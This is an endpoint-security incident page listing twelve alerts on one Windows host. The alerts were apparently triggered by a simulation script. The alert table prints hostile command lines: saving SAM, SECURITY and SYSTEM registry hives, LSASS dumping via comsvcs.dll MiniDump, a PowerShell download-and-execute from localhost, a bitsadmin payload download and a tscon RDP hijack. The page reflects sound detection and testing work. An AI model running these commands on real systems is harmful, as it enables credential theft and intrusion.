Back to list

Critical CINC-20251221-C8245A7D new

Aggregate ID: aggind:561559e2fcea400ba3601b74d64aa30b:4449997077

Incident Overview

Incident ID CINC-20251221-C8245A7D

Severity Critical (90)

Status new

Alert Count 12

Host Count 1

Timeline

First Seen 2025-12-22 06:19:36

Last Seen 2025-12-22 06:20:32

Duration 0d 0h 0m

Created 2025-12-22 08:36

Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...

Observed Tactics:

Techniques:

Affected Hosts (1)

Related Alerts (12)

Severity	Status	Hostname	Description	Tactic	Command Line	Time
Informational	new	DESKTOP-FNUMV3U	A process has written a known EICAR test file. Review the files written by the triggered process.	Execution	"python" mega_incident_generator.py --rounds 2 --interval 30	12-22 06:20
High	new	DESKTOP-FNUMV3U	A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree.	Defense Evasion	bitsadmin /transfer j http://127.0.0.1/test C:\Users\User\AppData\Local\Temp\bits.exe	12-22 06:20
Critical	new	DESKTOP-FNUMV3U	A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.	Credential Access	reg save HKLM\SECURITY C:\Users\User\AppData\Local\Temp\security.hiv	12-22 06:20
Critical	new	DESKTOP-FNUMV3U	A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.	Credential Access	reg save HKLM\SECURITY C:\Users\User\AppData\Local\Temp\security.hiv	12-22 06:20
High	new	DESKTOP-FNUMV3U	A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.	Execution	C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')""	12-22 06:20
Critical	new	DESKTOP-FNUMV3U	A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.	Credential Access	reg save HKLM\SYSTEM C:\Users\User\AppData\Local\Temp\system.hiv	12-22 06:20
Critical	new	DESKTOP-FNUMV3U	A process appears to be accessing credentials and might be dumping passwords. If this is unexpected, review the process tree.	Credential Access	rundll32 comsvcs.dll MiniDump 123 C:\Users\User\AppData\Local\Temp\dump.dmp full	12-22 06:20
High	new	DESKTOP-FNUMV3U	Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree.	Defense Evasion	C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\User\AppData\Local\Temp\dump.dmp full"	12-22 06:20
High	new	DESKTOP-FNUMV3U	A command line indicates an attempt to hijack a remote desktop protocol session. Review the process tree.	Lateral Movement	tscon 1 /dest:rdp-tcp#0	12-22 06:20
High	new	DESKTOP-FNUMV3U	Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree.	Defense Evasion	rundll32 comsvcs.dll MiniDump 123 C:\Users\User\AppData\Local\Temp\dump.dmp full	12-22 06:20
High	new	DESKTOP-FNUMV3U	A command line indicates an attempt to hijack a remote desktop protocol session. Review the process tree.	Lateral Movement	C:\WINDOWS\system32\cmd.exe /c "tscon 1 /dest:rdp-tcp#0"	12-22 06:20
Informational	new	DESKTOP-FNUMV3U	A process has written a known EICAR test file. Review the files written by the triggered process.	Execution	"python" mega_incident_generator.py --rounds 2 --interval 30	12-22 06:19